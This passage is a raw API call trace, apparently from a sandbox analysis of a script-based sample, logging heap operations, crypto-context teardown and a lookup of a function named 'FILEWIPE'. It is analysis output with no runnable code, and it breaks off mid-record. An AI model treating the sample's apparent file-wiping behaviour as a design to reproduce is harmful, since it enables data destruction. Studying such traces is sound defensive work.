| out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0193.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.845] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.845] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0193.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.845] CryptDestroyKey (hKey=0x90af98) returned 1 [0193.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0193.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0193.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0193.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.847] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0193.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.848] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.848] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.848] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0193.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0193.905] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0193.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0193.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0193.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.937] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.970] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.976] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0193.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0193.980] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0193.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0193.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0193.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.984] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.986] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.986] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0193.987] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0193.987] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.987] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.988] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.988] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.988] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.988] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.993] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0193.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.996] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0193.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0193.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.999] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.022] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0194.022] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0194.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0194.022] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.023] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0194.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.023] FreeLibrary (hLibModule=0x74f20000) returned 1 [0194.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0194.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0194.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0194.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0194.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.068] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0194.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0194.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0194.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.095] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0194.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0194.109] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0194.112] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0194.115] RtlAllocateHeap 